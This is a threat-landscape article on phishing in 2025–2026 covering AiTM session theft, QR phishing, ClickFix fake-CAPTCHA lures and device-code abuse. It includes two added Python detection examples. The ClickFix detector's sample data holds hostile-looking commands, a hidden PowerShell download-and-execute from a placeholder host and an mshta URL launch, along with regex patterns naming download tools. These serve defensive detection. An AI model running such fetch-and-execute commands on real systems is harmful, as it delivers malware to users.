Phishing in 2025–2026: A Threat That Stopped Asking for Permission


The numbers are worse than most organizations realize. The methods are smarter than most training programs anticipated. And the window between a phish landing and a breach completing has never been shorter.

There’s a version of the phishing conversation that security teams have been having for twenty years. It goes like this: employees receive suspicious emails, they shouldn’t click on links, they should verify before they act.

Train them. Test them. Research the newer tactics. Repeat annually.

That conversation was always insufficient. In 2025 and 2026, it will become operationally dangerous. Phishing has not simply scaled; it has restructured.

The craft of social engineering, once bottlenecked by the time it took to write convincing lures and build credible impersonations, has been largely automated.

What a skilled attacker spent sixteen hours constructing in 2022 now takes roughly five minutes with a capable large language model. The consequence isn’t just more phishing.

It’s better phishing, deployed faster, across more channels, against targets who have been pre-researched by the same AI tools that wrote the message.

The numbers bear this out in ways that should concentrate minds at every level of an organization, not just the SOC.

What the Data Actually Shows

The headline figures from the past 18 months, drawn from APWG, IBM, FBI IC3, and independent security research:

- Over 3.4 billion phishing emails sent daily — roughly 1.2% of all global email traffic (multiple sources, 2025)
- APWG logged 4.8 million phishing attacks in 2024 — the highest since the organization was founded in 2003 (APWG 2024)
- Global phishing sites reached 1,050,031 in 2025, up from 932,923 in 2024 (Zensec / APWG 2025)
- 82.6% of phishing emails detected (Sep 2024–Feb 2025) showed AI involvement — a 53.5% year-on-year increase (Hoxhunt 2025)
- Average cost of a phishing-related breach: $4.88 million — up from $4.76 million in 2024 (IBM Cost of a Data Breach 2025)
- 254 days: average time to identify and contain a breach that began with a phishing email (IBM / Keepnet 2025)
- BEC attacks alone caused $2.77 billion in reported losses in 2024 across 21,442 FBI complaints (FBI IC3 2024)
- Adversary-in-the-Middle (AiTM) attacks surged 146% in 2024; Microsoft reported 10,000+ per month targeting its users (Microsoft / APWG 2024)
- AI-generated phish hit 56% of all phishing email samples in December 2025 — up from 4% the previous month (Hoxhunt Threat Report 2026)
- Over 90% of all cyberattacks begin with phishing (CISA)

A few of those numbers should stop the reader. The December 2025 surge in AI-generated phishing, from 4% to 56% of sampled attacks in a single month, is not a trend line.

It is a step change. Security researchers at Hoxhunt attributed it partly to the holiday period, when attacker activity and human cognitive load peak simultaneously. But the proportion has not retreated to pre-December levels in 2026 reporting.

Equally significant is the 254-day detection window. A phishing email that succeeds on Monday does not typically produce a visible incident by Friday. It produces a foothold.

What happens in the months that follow is lateral movement, privilege escalation, data staging and exfiltration. This is where the real damage accumulates.

The financial cost difference between breaches identified before and after 200 days averages $1.2 million.

The Methods That Defined 2025–2026

The phishing techniques gaining ground right now are not refinements of old approaches. They are structural workarounds for the defenses organizations invested in over the last decade.

Adversary-in-the-Middle (AiTM) Attacks

Multi-factor authentication was supposed to close the credential theft loop. Sadly, AiTM attacks are specifically engineered to reopen it.

The victim authenticates normally, including completing their MFA challenge. The attacker’s infrastructure intercepts the resulting session cookie in real time. 

The credential is irrelevant. The session is what matters, and the session is already compromised before the login screen closes.
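The session-theft mechanism described above leaves two traces a defender can look for: the MFA sign-in itself originates from the attacker's proxy rather than from a network the user normally uses, and the stolen session is then replayed from a different address and browser than the one that completed the sign-in. The following is an added example, not code from the original article; it runs over a constructed sign-in and session-use log with invented users, IPs and ASN labels, and the baseline of "known" ASNs is assumed to come from the organization's own sign-in history.

```python
"""Session-token anomaly detection for AiTM-style session theft (added example)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    ts: int            # seconds since epoch (constructed values)
    user: str
    session_id: str
    ip: str
    asn: str           # autonomous system label, e.g. "corp-isp" or "hosting-xyz"
    user_agent: str
    kind: str          # "signin_mfa" (MFA challenge completed) or "session_use"


# Constructed sample log: alice signs in and keeps using her session normally;
# bob's MFA sign-in arrives via an unfamiliar hosting ASN (the proxy), and the
# same session is then reused from a different IP and browser a few minutes later.
SAMPLE_EVENTS = [
    Event(1000, "alice", "s1", "203.0.113.10", "corp-isp", "Chrome/124", "signin_mfa"),
    Event(1300, "alice", "s1", "203.0.113.10", "corp-isp", "Chrome/124", "session_use"),
    Event(2000, "bob", "s2", "198.51.100.7", "hosting-xyz", "Chrome/124", "signin_mfa"),
    Event(2400, "bob", "s2", "192.0.2.55", "hosting-abc", "Firefox/120", "session_use"),
]

# Constructed baseline: ASNs each user has historically signed in from.
KNOWN_ASNS = {"alice": {"corp-isp"}, "bob": {"corp-isp", "mobile-carrier"}}


def detect_session_anomalies(events, known_asns):
    """Return a list of (session_id, reason) findings, in log order.

    Two checks: an MFA sign-in from an ASN the user has never used, and a
    session reused from an IP or user agent different from the one that
    established it. Either is worth a ticket; both together is the AiTM pattern.
    """
    findings = []
    origin = {}  # session_id -> the sign-in event that established the session
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.kind == "signin_mfa":
            origin[ev.session_id] = ev
            if ev.asn not in known_asns.get(ev.user, set()):
                findings.append((ev.session_id, f"mfa sign-in from unfamiliar ASN {ev.asn}"))
        elif ev.kind == "session_use":
            first = origin.get(ev.session_id)
            if first is None:
                findings.append((ev.session_id, "session used without an observed sign-in"))
                continue
            if ev.ip != first.ip or ev.user_agent != first.user_agent:
                findings.append((
                    ev.session_id,
                    f"session reused from {ev.ip} / {ev.user_agent}, "
                    f"established at {first.ip} / {first.user_agent}",
                ))
    return findings


if __name__ == "__main__":
    for session, reason in detect_session_anomalies(SAMPLE_EVENTS, KNOWN_ASNS):
        print(f"[{session}] {reason}")
```

In production the IP/user-agent comparison should tolerate legitimate changes (mobile networks rotate addresses), so weight the ASN and user-agent mismatch more heavily than a bare IP change, and feed confirmed findings into a conditional access policy that revokes the session rather than just alerting.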

The 146% surge in AiTM attacks recorded in 2024 reflects the maturation of the available toolkits. It also reflects the fact that MFA adoption has made traditional credential phishing less useful on its own.

As defenses improve, attack methodology evolves to route around them. That is the consistent pattern in this threat category and it is accelerating.

Quishing: QR Code Phishing

QR code phishing, or quishing, was an emerging technique. It crossed over into a mainstream threat vector in 2024 and has not slowed since.

Abnormal Security tracked a 400% increase in QR code attacks between 2023 and 2025. The mechanism is straightforward and its effectiveness is structural: a QR code embedded in an email is an image, not a URL.

The result is a delivery mechanism that bypasses the primary technical layer most organizations rely on for phishing filtering.

Energy, healthcare, and manufacturing have been the most affected sectors.

It is routine for employees in these industries to receive QR codes for legitimate operational purposes, which dulls the natural suspicion response. The attacker benefits from both the technical bypass and the contextual plausibility.

ClickFix and Fake CAPTCHA Campaigns

One of the more technically clever developments of 2025 is the ClickFix social engineering pattern, flagged prominently in ENISA’s 2025 threat landscape reporting.

The victim reaches what appears to be a CAPTCHA verification page, the familiar ‘I am not a robot’ interaction that millions of people complete without a second thought.

The page instructs the user to copy a command and paste it into their system’s Run dialog or terminal. The command executes malware.

What makes ClickFix particularly hard to defend against is that it exploits a learned behavior (completing CAPTCHAs) and places the malicious action entirely in the user’s hands.

No download prompt. No suspicious attachment. Just a user who was told to run something and did. Endpoint controls that flag suspicious file execution can catch it, but only if they’re configured and monitored correctly.
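The endpoint-side signal the paragraph above refers to is a process-creation event: a script host (PowerShell, cmd, mshta) started by the user's interactive shell, with a command line that hides its window, pulls content from a URL, or executes what it fetched. The following is an added example, not code from the original article or any vendor; the events, file paths and the `placeholder.invalid` hostname are constructed, and the indicator list is an assumed set of heuristics a detection engineer would tune against their own telemetry.

```python
"""Triage of process-creation events for ClickFix-style pasted commands (added example)."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str   # image name of the parent process
    image: str          # image name of the new process
    command_line: str


# Assumed heuristics: each pattern is one reason to look closer, none is proof.
INDICATORS = [
    (re.compile(r"-(w|window(style)?)\s*hidden", re.I), "hidden window"),
    (re.compile(r"-(e|enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"\b(iwr|invoke-webrequest|curl|wget|downloadstring|bitsadmin)\b", re.I), "remote download"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "inline execution"),
    (re.compile(r"^mshta(\.exe)?\b.*https?://", re.I), "mshta launched with a URL"),
]
# The Run dialog and a pasted terminal command both surface as children of the shell.
INTERACTIVE_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Constructed sample telemetry: two benign admin events and two ClickFix-shaped ones.
SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", "powershell.exe", "powershell.exe"),
    ProcessEvent("services.exe", "powershell.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"),
    ProcessEvent("explorer.exe", "powershell.exe",
                 'powershell -w hidden -c "iwr http://placeholder.invalid/x | iex"'),
    ProcessEvent("explorer.exe", "mshta.exe", "mshta https://placeholder.invalid/verify"),
]


def score_event(ev):
    """Return the list of reasons this event looks like a user-pasted payload."""
    reasons = []
    if ev.parent_image.lower() in INTERACTIVE_PARENTS and ev.image.lower() in SCRIPT_HOSTS:
        reasons.append("script host launched from interactive shell")
    for pattern, label in INDICATORS:
        if pattern.search(ev.command_line):
            reasons.append(label)
    return reasons


def triage(events, min_reasons=2):
    """Keep events with at least `min_reasons` reasons; a lone interactive
    PowerShell launch is normal for administrators and is not flagged."""
    flagged = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= min_reasons:
            flagged.append((ev, reasons))
    return flagged


if __name__ == "__main__":
    for ev, reasons in triage(SAMPLE_EVENTS):
        print(f"{ev.parent_image} -> {ev.image}: {', '.join(reasons)}")
        print(f"    {ev.command_line}")
```

The threshold is the tuning knob: raising it trades missed low-signal variants for fewer analyst interruptions, and the reasons list is what lets an analyst decide in seconds rather than re-reading the command line.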

Microsoft 365 Device Code Phishing

Proofpoint documented significant growth in a phishing technique that abuses Microsoft’s device code authentication flow. The feature was designed for smart TVs and devices without conventional keyboards.

The attacker initiates a legitimate device code authentication request and sends the resulting code to the target. It is typically framed as a verification step for a collaboration tool or an IT ticket.

If the target enters the code, the attacker receives a valid OAuth token. No password captured. No MFA to bypass. Full account access through Microsoft’s own authentication infrastructure.

This technique is particularly concerning because it produces clean audit logs. The token is issued legitimately. The authentication flow completed as designed.

Who Is Being Targeted — And Why the Distribution Matters

Financial services absorb 23.5% of phishing attacks globally, according to APWG’s 2024–2025 reporting. SaaS and webmail platforms account for 19.4%.

Small businesses occupy a particularly uncomfortable position. Employees at organizations with fewer than 100 people experience 350% more phishing and social engineering attempts than employees at large enterprises.

The attack surface is proportionally smaller, but the security resources to defend it are vastly more limited. 35% of micro-businesses reported a phishing incident in the past year.

The average new employee receives their first phishing email within three weeks of joining a company. In many cases, it happens before their employer has completed their security onboarding.

What Actually Works in Defense

The data on training effectiveness is worth taking seriously. Organizations with ongoing, adaptive security awareness programs see phishing click rates drop to as low as 1.5%. That compares with industry averages of 3–8% without structured training.

The rate at which employees flag suspicious emails to security teams rises from roughly 5% to 21% with recent training. Companies that receive twenty times more early warnings have a fundamentally different detection window than ones that receive almost none.

But training is not sufficient without technical controls. DNS-layer filtering catches malicious destinations before a session is established. Session token monitoring and conditional access policies address the AiTM problem more directly than password and MFA controls alone.

For organizations assessing their current posture honestly, the most useful starting question is not ‘do we have security awareness training?’ but ‘what would our detection capability look like if every one of our phishing controls failed simultaneously?’

Because in sufficiently sophisticated attacks (AiTM sessions, device code abuse, ClickFix execution), that is essentially the scenario on the table.

The Honest Assessment

Phishing is the most common initial access vector in cyberattacks because it works. It scales, and it targets the one component of an organization’s security posture that cannot be patched: the people.

That is not a new observation. What is new is the rate at which the methods are evolving relative to the defenses, and the degree to which AI has flattened the skill curve for attackers while raising the stakes for defenders.

The organizations that will fare better in this environment are not necessarily the ones with the largest security budgets.

They are the ones that have been honest about which of their controls are actually working, which are providing false confidence, and which of the new attack methods they are not yet equipped to detect.

Starting from an accurate picture of exposure is the minimum precondition for building a meaningful response to it.
